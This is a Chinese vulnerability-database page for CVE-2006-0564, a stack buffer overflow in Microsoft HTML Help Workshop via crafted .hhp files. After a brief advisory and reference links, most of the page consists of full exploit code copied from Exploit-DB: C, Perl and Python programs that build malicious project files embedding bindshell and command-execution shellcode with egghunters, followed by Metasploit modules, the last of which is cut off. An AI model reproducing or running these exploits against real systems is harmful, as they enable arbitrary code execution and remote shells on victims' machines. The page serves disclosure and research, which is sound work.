CVE-2006-0564
CVSS7.5
发布时间 :2006-02-06 18:02:00
修订时间 :2011-03-07 21:30:20
NMCOEP    

[原文]Stack-based buffer overflow in Microsoft HTML Help Workshop 4.74.8702.0, and possibly earlier versions, and as included in the Microsoft HTML Help 1.4 SDK, allows context-dependent attackers to execute arbitrary code via a .hhp file with a long Contents file field.


[CNNVD]Microsoft HTML Help Workshop 栈缓冲区溢出漏洞(CNNVD-200602-066)

        Microsoft HTML Help Workshop 4.74.8702.0(可能还包括之前的版本)以及Microsoft HTML Help 1.4 SDK中存在栈缓冲区溢出漏洞。与上下文相关的攻击者可以借助带有长 Contents 文件字段的.hhp文件执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:html_help:1.4::sdk
cpe:/a:microsoft:html_help_workshop:4.74.8702.0Microsoft html_help_workshop 4.74.8702.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0564
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0564
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-066
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/124460
(UNKNOWN)  CERT-VN  VU#124460
http://www.vupen.com/english/advisories/2006/0446
(UNKNOWN)  VUPEN  ADV-2006-0446
http://users.pandora.be/bratax/advisories/b008.html
(UNKNOWN)  MISC  http://users.pandora.be/bratax/advisories/b008.html
http://securitytracker.com/id?1015585
(UNKNOWN)  SECTRACK  1015585
http://secunia.com/advisories/18740
(VENDOR_ADVISORY)  SECUNIA  18740
http://xforce.iss.net/xforce/xfdb/24481
(UNKNOWN)  XF  mshtmlhelp-workshop-hhp-bo(24481)
http://www.osvdb.org/22941
(UNKNOWN)  OSVDB  22941

- 漏洞信息

Microsoft HTML Help Workshop 栈缓冲区溢出漏洞
高危 缓冲区溢出
2006-02-06 00:00:00 2006-02-08 00:00:00
远程  
        Microsoft HTML Help Workshop 4.74.8702.0(可能还包括之前的版本)以及Microsoft HTML Help 1.4 SDK中存在栈缓冲区溢出漏洞。与上下文相关的攻击者可以借助带有长 Contents 文件字段的.hhp文件执行任意代码。

- 公告与补丁

        

- 漏洞信息 (1470)

Microsoft HTML Help Workshop (.hhp file) Buffer Overflow Exploit (EDBID:1470)
windows local
2006-02-06 Verified
0 bratax
N/A [点击下载]
/*
Microsoft HTML Help Workshop .hhp file Buffer Overflow Exploit
by bratax (http://www.bratax.be/)

-> greets to:
all my miffm00f buddies, BuzzDee and everyone else I forgot who should be in here
-> thx to:
Curt Wilson @ SIUC (maybe you don't know why but this exploit wouldn't
exist if we didn't have that conversation a long long time ago)
nolimit & buzzdee (I used most of your realplayer .smil exploit code because I
didn't feel like writing this code from scratch :p)
-> special thx to:
duksie, dwarf & turb00 (you guys know why)

C:\htmlws>poc2
Microsoft HTML Help Workshop Buffer Overflow.
Coded by bratax (http://www.bratax.be/).
Usage: C:\htmlws\PoC2.exe <outputfile>

C:\htmlws>poc2 new.hhp
File written.
Open with Microsoft Help Workshop to exploit.

C:\htmlws>nc -vv localhost 13579
DNS fwd/rev mismatch: RENEE != localhost
RENEE [127.0.0.1] 13579 (?) open
Microsoft Windows XP [versie 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\htmlws>exit
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char pre[]=
"[OPTIONS]\n"
"Compatibility=1.1 or later\n"
"Compiled file=bratax.chm\n"
"Contents file=";

char end[]=
"Display compile progress=No\n"
"Language=0x813 Dutch (Belgium)\n\n\n"
"[INFOTYPES]";

char shellcode[]=
/* bindshell port 13579 thx to metasploit.com :) */
"\x29\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8f"
"\x35\x37\x85\x83\xeb\xfc\xe2\xf4\x73\x5f\xdc\xca\x67\xcc\xc8\x7a"
"\x70\x55\xbc\xe9\xab\x11\xbc\xc0\xb3\xbe\x4b\x80\xf7\x34\xd8\x0e"
"\xc0\x2d\xbc\xda\xaf\x34\xdc\x66\xbf\x7c\xbc\xb1\x04\x34\xd9\xb4"
"\x4f\xac\x9b\x01\x4f\x41\x30\x44\x45\x38\x36\x47\x64\xc1\x0c\xd1"
"\xab\x1d\x42\x66\x04\x6a\x13\x84\x64\x53\xbc\x89\xc4\xbe\x68\x99"
"\x8e\xde\x34\xa9\x04\xbc\x5b\xa1\x93\x54\xf4\xb4\x4f\x51\xbc\xc5"
"\xbf\xbe\x77\x89\x04\x45\x2b\x28\x04\x75\x3f\xdb\xe7\xbb\x79\x8b"
"\x63\x65\xc8\x53\xbe\xee\x51\xd6\xe9\x5d\x04\xb7\xe7\x42\x44\xb7"
"\xd0\x61\xc8\x55\xe7\xfe\xda\x79\xb4\x65\xc8\x53\xd0\xbc\xd2\xe3"
"\x0e\xd8\x3f\x87\xda\x5f\x35\x7a\x5f\x5d\xee\x8c\x7a\x98\x60\x7a"
"\x59\x66\x64\xd6\xdc\x66\x74\xd6\xcc\x66\xc8\x55\xe9\x5d\x02\x8e"
"\xe9\x66\xbe\x64\x1a\x5d\x93\x9f\xff\xf2\x60\x7a\x59\x5f\x27\xd4"
"\xda\xca\xe7\xed\x2b\x98\x19\x6c\xd8\xca\xe1\xd6\xda\xca\xe7\xed"
"\x6a\x7c\xb1\xcc\xd8\xca\xe1\xd5\xdb\x61\x62\x7a\x5f\xa6\x5f\x62"
"\xf6\xf3\x4e\xd2\x70\xe3\x62\x7a\x5f\x53\x5d\xe1\xe9\x5d\x54\xe8"
"\x06\xd0\x5d\xd5\xd6\x1c\xfb\x0c\x68\x5f\x73\x0c\x6d\x04\xf7\x76"
"\x25\xcb\x75\xa8\x71\x77\x1b\x16\x02\x4f\x0f\x2e\x24\x9e\x5f\xf7"
"\x71\x86\x21\x7a\xfa\x71\xc8\x53\xd4\x62\x65\xd4\xde\x64\x5d\x84"
"\xde\x64\x62\xd4\x70\xe5\x5f\x28\x56\x30\xf9\xd6\x70\xe3\x5d\x7a"
"\x70\x02\xc8\x55\x04\x62\xcb\x06\x4b\x51\xc8\x53\xdd\xca\xe7\xed"
"\xf1\xed\xd5\xf6\xdc\xca\xe1\x7a\x5f\x35\x37\x85";



char overflow[15000];	// 15k just to make sure :)
int main(int argc,char *argv[])
{

	FILE *vuln;
	if(argc == 1)
	{
		printf("Microsoft HTML Help Workshop Buffer Overflow.\n");
		printf("Coded by bratax (http://www.bratax.be/).\n");
		printf("Usage: %s <outputfile>\n",argv[0]);
		return 0;
	}
	vuln = fopen(argv[1],"w");
	//build overflow buffer here.
	memset(overflow,0x90,sizeof(overflow)); //fill with nops
	memcpy(overflow+272,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)  1 of these is
	memcpy(overflow+276,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)  enough but was
	memcpy(overflow+280,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)  a bit lazy to
	memcpy(overflow+284,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)  find out the
	memcpy(overflow+288,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)	correct one :p
	memcpy(overflow+292,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)
   memcpy(overflow+300,shellcode,sizeof(shellcode)); //our shellcode after some nops to land in

	if(vuln)
	{
		//Write file
		fprintf(vuln,"%s%s\"/>\n%s",pre,overflow,end);
		fclose(vuln);
	}
	printf("File written.\nOpen with Microsoft Help Workshop to exploit.\n");
	return 0;
}

// milw0rm.com [2006-02-06]
		

- 漏洞信息 (1490)

Microsoft HTML Help Workshop (.hhp file) Buffer Overflow Exploit (new) (EDBID:1490)
windows local
2006-02-11 Verified
0 k3xji
N/A [点击下载]
/*
Microsoft HTML Help Workshop .hhp file Compiled File Header Buffer Overflow Exploit
The Buffer Overlfow in Compiled File in Options in a HHP file.

Bug found by:darkeagle
Exploit coded by:k3xji
Mail:sumerc@gmail.com
Web: www.guvenliklab.com

Tested:Win XP SP2
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFLEN 0xe6

char sta[]=
"[OPTIONS]\n"
"Compatibility=1.1 or later\n"
"Compiled file=";

char fin[]=
"Display compile progress=No\n"
"Language=Turkish\n\n\n"
"[INFOTYPES]";

char jmpcode[]= "\x5d\x38\x82\x7c\x5d\x38\x82\x7c\x90\x90\x90\x90\x83\xEC\x34\x90\x83\xEC\x78\x90\xFF\xE4\x90\x90";

char shellcode[]=
    //Taken from ATmaCA's Execute Calc.exe shellcode.Thx.A bit lazy to call ExitProcess:P
    "\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02"
    "\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48"
    "\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4"
    "\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12"
    "\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69"
    "\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6"
    "\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5"
    "\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21"
    "\x61\xdd\x0e\x4d";

int main(int argc,char *argv[])
{

	printf("\nMicrosoft Help WorkShop Compiled File Header Buffer Overflow");
    printf("\nBug discovered by darkeagle");
	printf("\nExploit coded by k3xji");
    printf("\nE-Mail: sumerc@gmail.com");

	FILE *vuln;
	char *overflow;
	overflow = (char*)malloc(BUFLEN);	
	vuln = fopen("poc.hhp","w");

	//build overflow buffer here.
	memset(overflow,0x90,BUFLEN);					    //fill noPs
	memcpy(overflow+0x2a,shellcode,sizeof(shellcode));  //shellcod3
	memcpy(overflow+0xce,jmpcode,sizeof(jmpcode));      //jmpcod3
 
	if(vuln)
	{
		//Write to the poc.hhp file
		fprintf(vuln,"%s%s\"/>\n%s",sta,overflow,fin);
		fclose(vuln);
	}
	printf("\n\npoc.hhp file is written.\n");
	printf("Open file with Microsoft Help Workshop.\n");
	return 0;
}

// milw0rm.com [2006-02-11]
		

- 漏洞信息 (7727)

Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit (EDBID:7727)
windows local
2009-01-12 Verified
0 SkD
N/A [点击下载]
#!/usr/bin/perl
# Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit
# -----------------------------------------------------------------
# Discovered/Exploit by SkD                    (skdrat@hotmail.com)
# -----------------------------------------------------------------
#
# This is a continuation of my new method, shellhunting.
# The exploit is far more advanced than the Amaya's as it runs on
# every system, partly because the shellhunter itself is very much
# reliable and universal.
# The shellhunter does the following tasks to find and exec.
# shellcode:-
#
# 1- Searches through the whole memory of the application.
# 2- Installs a SEH handler so on access violations it won't
#    stop hunting for the shellcode.
# 3- Repairs stack so a stack overflow won't occur (that is what
#    happens when the SEH is called up, many PUSH instructions
#    are called from the relevant modules (ntdll, etc).
# 4- Improved speed by searching through 32 bytes at a time.
# 5- Uses a certain address in memory to store a variable for the
#    search.
#
# It is very stable and will allow any shellcode (bind/reverse shell,
# dl/exec). It will work on ALL Windows NT versions (2k, XP, Vista).
#
# Yeah, I guess that's about it. Took me a few hours to figure out the
# whole thing but nothing is impossible ;).
#
# Oh, I think some schools use this software :) (it's Microsoft's, right?).
#
# You can download the app. from Microsoft's official page:
# ->  http://msdn.microsoft.com/en-us/library/ms669985.aspx
#
# If you are interested in my method and want to learn something new or
# improve your exploitation skills then visit my team's blog at:
# ->  http://abysssec.com
#
# Peace out,
# SkD.



my $hhp_data1 = "\x5B\x4F\x50\x54\x49\x4F\x4E\x53".
	        "\x5D\x0D\x0A\x43\x6F\x6E\x74\x65".
                "\x6E\x74\x73\x20\x66\x69\x6C\x65".
                "\x3D\x41\x0D\x0A\x49\x6E\x64\x65".
	        "\x78\x20\x66\x69\x6C\x65\x3D";
my $hhp_data2 = "\x5B\x46\x49\x4C\x45\x53\x5D\x0D".
		"\x0A\x61\x2E\x68\x74\x6D";
my $crlf      = "\x0d\x0a";

# win32_exec -  EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x51\x5a\x6a\x46".
"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x56\x42\x32\x42\x41\x41\x32".
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x58\x69\x69\x6c\x4b".
"\x58\x62\x64\x65\x50\x67\x70\x47\x70\x6c\x4b\x42\x65\x45\x6c\x6e".
"\x6b\x73\x4c\x53\x35\x73\x48\x45\x51\x4a\x4f\x6c\x4b\x70\x4f\x52".
"\x38\x4c\x4b\x33\x6f\x55\x70\x57\x71\x6a\x4b\x61\x59\x4c\x4b\x36".
"\x54\x6e\x6b\x53\x31\x48\x6e\x55\x61\x39\x50\x4d\x49\x4c\x6c\x4d".
"\x54\x6b\x70\x74\x34\x66\x67\x4b\x71\x78\x4a\x56\x6d\x67\x71\x39".
"\x52\x48\x6b\x4c\x34\x35\x6b\x62\x74\x56\x44\x57\x74\x54\x35\x6b".
"\x55\x4e\x6b\x31\x4f\x65\x74\x67\x71\x5a\x4b\x50\x66\x6c\x4b\x56".
"\x6c\x42\x6b\x6e\x6b\x53\x6f\x47\x6c\x67\x71\x7a\x4b\x6c\x4b\x45".
"\x4c\x6c\x4b\x47\x71\x48\x6b\x4f\x79\x33\x6c\x44\x64\x73\x34\x49".
"\x53\x70\x31\x6b\x70\x71\x74\x4e\x6b\x73\x70\x56\x50\x4b\x35\x49".
"\x50\x62\x58\x66\x6c\x4c\x4b\x43\x70\x56\x6c\x4c\x4b\x50\x70\x45".
"\x4c\x4c\x6d\x6c\x4b\x35\x38\x77\x78\x78\x6b\x67\x79\x4e\x6b\x6b".
"\x30\x6c\x70\x57\x70\x63\x30\x33\x30\x4c\x4b\x32\x48\x67\x4c\x73".
"\x6f\x35\x61\x48\x76\x71\x70\x56\x36\x6c\x49\x4a\x58\x6e\x63\x69".
"\x50\x41\x6b\x56\x30\x65\x38\x6c\x30\x6f\x7a\x75\x54\x73\x6f\x31".
"\x78\x4e\x78\x79\x6e\x6f\x7a\x36\x6e\x66\x37\x6b\x4f\x5a\x47\x52".
"\x43\x65\x31\x30\x6c\x70\x63\x45\x50\x46";


#/----------------Advanced Shellhunter Code----------------\
#01D717DD   EB 1E            JMP SHORT 01D717FD            |
#01D717DF   83C4 64          ADD ESP,64                    |
#01D717E2   83C4 64          ADD ESP,64                    |
#01D717E5   83C4 64          ADD ESP,64                    |
#01D717E8   83C4 64          ADD ESP,64                    |
#01D717EB   83C4 64          ADD ESP,64                    |
#01D717EE   83C4 64          ADD ESP,64                    |
#01D717F1   83C4 64          ADD ESP,64                    |
#01D717F4   83C4 64          ADD ESP,64                    |
#01D717F7   83C4 64          ADD ESP,64                    |
#01D717FA   83C4 54          ADD ESP,54                    |
#01D717FD   33FF             XOR EDI,EDI                   |
#01D717FF   BA D0FAFD7F      MOV EDX,7FFDFAD0              |
#01D71804   8B3A             MOV EDI,DWORD PTR DS:[EDX]    |
#01D71806   EB 0E            JMP SHORT 01D71816            |
#01D71808   58               POP EAX                       |
#01D71809   83E8 3C          SUB EAX,3C                    |
#01D7180C   50               PUSH EAX                      |
#01D7180D   6A FF            PUSH -1                       |
#01D7180F   33DB             XOR EBX,EBX                   |
#01D71811   64:8923          MOV DWORD PTR FS:[EBX],ESP    |
#01D71814   EB 05            JMP SHORT 01D7181B            |
#01D71816   E8 EDFFFFFF      CALL 01D71808                 |
#01D7181B   B8 12121212      MOV EAX,12121212              |
#01D71820   6BC0 02          IMUL EAX,EAX,2                |
#01D71823   BA D0FAFD7F      MOV EDX,7FFDFAD0              |
#01D71828   83C7 20          ADD EDI,20                    |
#01D7182B   893A             MOV DWORD PTR DS:[EDX],EDI    |
#01D7182D   3907             CMP DWORD PTR DS:[EDI],EAX    |
#01D7182F  ^75 F7            JNZ SHORT 01D71828            |
#01D71831   83C7 04          ADD EDI,4                     |
#01D71834   6BC0 02          IMUL EAX,EAX,2                |
#01D71837   3907             CMP DWORD PTR DS:[EDI],EAX    |
#01D71839  ^75 E0            JNZ SHORT 01D7181B            |
#01D7183B   83C7 04          ADD EDI,4                     |
#01D7183E   B8 42424242      MOV EAX,42424242              |
#01D71843   3907             CMP DWORD PTR DS:[EDI],EAX    |
#01D71845  ^75 D4            JNZ SHORT 01D7181B            |
#01D71847   83C7 04          ADD EDI,4                     |
#01D7184A   FFE7             JMP EDI                       |
#\-----------------------End of Code----------------------/

my $shellhunter = "\xeb\x1e".
                  "\x83\xc4\x64".
                  "\x83\xc4\x64".
                  "\x83\xc4\x64".
                  "\x83\xc4\x64".
                  "\x83\xc4\x64".
                  "\x83\xc4\x64".
                  "\x83\xc4\x64".
                  "\x83\xc4\x64".
                  "\x83\xc4\x64".
                  "\x83\xc4\x54".
		  "\x33\xff".
		  "\xba\xd0\xfa\xfd\x7f".
                  "\x8b\x3a".
                  "\xeb\x0e".
                  "\x58".
                  "\x83\xe8\x3c".
                  "\x50".
                  "\x6a\xff".
                  "\x33\xdb".
                  "\x64\x89\x23".
                  "\xeb\x05".
                  "\xe8\xed\xff\xff\xff".
                  "\xb8\x12\x12\x12\x12".
                  "\x6b\xc0\x02".
                  "\xba\xd0\xfa\xfd\x7f".
                  "\x83\xc7\x20".
                  "\x89\x3a".
                  "\x39\x07".
                  "\x75\xf7".
                  "\x83\xc7\x04".
                  "\x6b\xc0\x02".
                  "\x39\x07".
                  "\x75\xe0".
                  "\x83\xc7\x04".
                  "\xb8\x42\x42\x42\x42".
                  "\x39\x07".
                  "\x75\xd4".
                  "\x83\xc7\x04".
                  "\xff\xe7";
my $lookout1 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42" x 64;
my $lookout2 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42" x 64;
my $lookout3 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42" x 64;
my $lookout4 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42\x42" x 64;
my $len = 280 - (length($shellhunter) + 55);
my $overflow1 = "\x41" x $len;
my $overflow2 = "\x41" x 55;
my $overflow3 = "\x42" x 256;
my $ret = "\x93\x1f\x40\x00"; #0x00401f93   CALL EDI [hhw.exe]


open(my $hhpprj_file, "> s.hhp");
print $hhpprj_file $hhp_data1.
		   $overflow1.$shellhunter.$overflow2.$ret.
                   $crlf.$crlf.
                   $hhp_data2.
                   $overflow3.$lookout1.$lookout2.$lookout3.$lookout4.$shellcode.$overflow3.
                   $crlf;
close $hhpprj_file;

# milw0rm.com [2009-01-12]
		

- 漏洞信息 (10321)

HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit (EDBID:10321)
windows local
2009-12-05 Verified
0 Encrypt3d.M!Nd
[点击下载] [点击下载]
#exploit.py
#
# HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
# By: Encrypt3d.M!nd
#     http://m1nd3d.wordpress.com/
# Based on: http://www.milw0rm.com/exploits/7727
####################################################################
# Well, I've tested SKD Exploit on Win 7 and didn't work.I Think it's
# Shellhunter compatibility problem. so i wrote this and used egg hunting-
# method. Would take some time to execute the shellcode,but it will run ;-)
#
#    Tested on : Windows xp sp3
#                Windows 7 ultimate
#



hhp_data1 =("\x5B\x4F\x50\x54\x49\x4F\x4E\x53"
	    "\x5D\x0D\x0A\x43\x6F\x6E\x74\x65"
            "\x6E\x74\x73\x20\x66\x69\x6C\x65"
            "\x3D\x41\x0D\x0A\x49\x6E\x64\x65"
	    "\x78\x20\x66\x69\x6C\x65\x3D")

crlf      =("\x0d\x0a")

hhp_data2 =("\x5B\x46\x49\x4C\x45\x53\x5D\x0D")

eggh= ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x69\x72\x61\x71\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

overflow1= "\x41" * 224


shellcode = "Devil_inside.htm"
shellcode+= "\x69\x72\x61\x71\x69\x72\x61\x71"
#
# windows/exec - 454 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=thread, CMD=calc
#
shellcode+=(
"\x89\xe5\xda\xd6\xd9\x75\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x49\x6c\x4b\x58\x4c\x49\x47\x70\x47\x70\x43\x30\x45\x30\x4b"
"\x39\x4b\x55\x44\x71\x4a\x72\x51\x74\x4c\x4b\x50\x52\x44\x70"
"\x4c\x4b\x43\x62\x46\x6c\x4e\x6b\x42\x72\x47\x64\x4e\x6b\x42"
"\x52\x46\x48\x44\x4f\x4f\x47\x51\x5a\x45\x76\x50\x31\x4b\x4f"
"\x45\x61\x49\x50\x4e\x4c\x47\x4c\x45\x31\x51\x6c\x43\x32\x44"
"\x6c\x45\x70\x4a\x61\x4a\x6f\x46\x6d\x47\x71\x48\x47\x48\x62"
"\x48\x70\x46\x32\x50\x57\x4e\x6b\x51\x42\x42\x30\x4e\x6b\x42"
"\x62\x47\x4c\x43\x31\x4e\x30\x4c\x4b\x47\x30\x42\x58\x4d\x55"
"\x4f\x30\x44\x34\x42\x6a\x46\x61\x4a\x70\x42\x70\x4e\x6b\x42"
"\x68\x44\x58\x4c\x4b\x43\x68\x51\x30\x43\x31\x4e\x33\x49\x73"
"\x47\x4c\x42\x69\x4c\x4b\x45\x64\x4e\x6b\x46\x61\x4b\x66\x50"
"\x31\x49\x6f\x44\x71\x4f\x30\x4e\x4c\x4f\x31\x4a\x6f\x44\x4d"
"\x46\x61\x4f\x37\x46\x58\x4b\x50\x51\x65\x49\x64\x44\x43\x43"
"\x4d\x48\x78\x47\x4b\x43\x4d\x46\x44\x43\x45\x49\x72\x51\x48"
"\x4c\x4b\x46\x38\x51\x34\x47\x71\x4a\x73\x51\x76\x4e\x6b\x44"
"\x4c\x42\x6b\x4e\x6b\x43\x68\x45\x4c\x43\x31\x4b\x63\x4e\x6b"
"\x45\x54\x4c\x4b\x45\x51\x4e\x30\x4f\x79\x51\x54\x44\x64\x51"
"\x34\x51\x4b\x51\x4b\x51\x71\x42\x79\x43\x6a\x42\x71\x49\x6f"
"\x4d\x30\x51\x48\x51\x4f\x43\x6a\x4c\x4b\x44\x52\x48\x6b\x4c"
"\x46\x51\x4d\x43\x5a\x47\x71\x4c\x4d\x4c\x45\x4e\x59\x45\x50"
"\x43\x30\x43\x30\x46\x30\x51\x78\x50\x31\x4e\x6b\x42\x4f\x4c"
"\x47\x4b\x4f\x48\x55\x4f\x4b\x4d\x30\x47\x6d\x44\x6a\x47\x7a"
"\x50\x68\x49\x36\x4f\x65\x4f\x4d\x4d\x4d\x4b\x4f\x4e\x35\x47"
"\x4c\x44\x46\x43\x4c\x47\x7a\x4b\x30\x49\x6b\x4d\x30\x43\x45"
"\x43\x35\x4d\x6b\x43\x77\x45\x43\x42\x52\x42\x4f\x42\x4a\x43"
"\x30\x43\x63\x4b\x4f\x4e\x35\x50\x63\x51\x71\x50\x6c\x45\x33"
"\x45\x50\x41\x41")

overflow2= "\x42" * 24
ret = ("\x93\x1f\x40\x00") # Call Edi - hhw.exe (universal huh?)

file=open('Devil.hhp','w')
file.write(hhp_data1+overflow1+eggh+overflow2+ret+crlf+crlf+hhp_data2+crlf+shellcode+"\x41"
* 4000)
file.close()
		

- 漏洞信息 (16648)

HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit (EDBID:16648)
windows local
2010-09-25 Verified
0 metasploit
N/A [点击下载]
##
# $Id: hhw_hhp_contentfile_bof.rb 10477 2010-09-25 11:59:02Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Egghunter

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit',
			'Description'    => %q{
					This module exploits a stack buffer overflow in HTML Help Workshop 4.74
					By creating a specially crafted hhp file, an an attacker may be able
					to execute arbitrary code.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'bratax', 'jduck' ],
			'Version'        => '$Revision: 10477 $',
			'References'     =>
				[
					[ 'CVE', '2006-0564' ],
					[ 'OSVDB', '22941' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/1470' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/1495' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'DisablePayloadHandler' => 'true',
				},
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x0a\x0d\x1a\x2f\x5c",
					'StackAdjustment' => -4800,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP English SP3', { 'Offset' => 280, 'Ret' => 0x00401F93 } ], # CALL EDI hhw.exe v4.74.8702.0
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Feb 06 2006',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME',   [ false, 'The file name.', 'msf.hhp']),
			], self.class)
	end

	def exploit

		# use the egghunter!
		eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })

		off = target['Offset']
		idxf = ""
		idxf << make_nops(off - eh_stub.length)
		idxf << eh_stub
		idxf << [target.ret].pack('V')

		sploit = "[OPTIONS]\r\n"
		sploit << "Contents file="
		sploit << idxf
		sploit << "\r\n"
		sploit << "\r\n"
		sploit << "[FILES]\r\n"
		sploit << "\r\n"
		sploit << eh_egg

		hhp = sploit

		print_status("Creating '#{datastore['FILENAME']}' file ...")

		file_create(hhp)
	end

end
		

- 漏洞信息 (16683)

HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit (EDBID:16683)
windows local
2010-09-25 Verified
0 metasploit
N/A [点击下载]
##
# $Id: hhw_hhp_compiledfile_bof.rb 10477 2010-09-25 11:59:02Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Egghunter

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit',
			'Description'    => %q{
					This module exploits a stack buffer overflow in HTML Help Workshop 4.74
				By creating a specially crafted hhp file, an an attacker may be able
				to execute arbitrary code.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'bratax', 'jduck' ],
			'Version'        => '$Revision: 10477 $',
			'References'     =>
				[
					[ 'CVE', '2006-0564'],
					[ 'OSVDB', '22941'],
					[ 'URL', 'http://www.exploit-db.com/exploits/1488' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/1490' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'DisablePayloadHandler' => 'true',
				},
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x0a\x0d\x1a\x2f\x5c",
					'StackAdjustment' => -4800,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP English SP3', { 'Offset' => 242, 'Ret' => 0x00401F93 } ], # CALL EDI hhw.exe v4.74.8702.0
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Feb 06 2006',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('FILENAME',   [ false, 'The file name.', 'msf.hhp']),
				], self.class)

	end

	def exploit

		# use the egghunter!
		eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })

		off = target['Offset']
		idxf = ""
		idxf << make_nops(off - eh_stub.length)
		idxf << eh_stub
		idxf << [target.ret].pack('V')

		sploit = "[OPTIONS]\r\n"
		sploit << "Compiled file="
		sploit << idxf
		sploit << "\r\n"
		sploit << "\r\n"
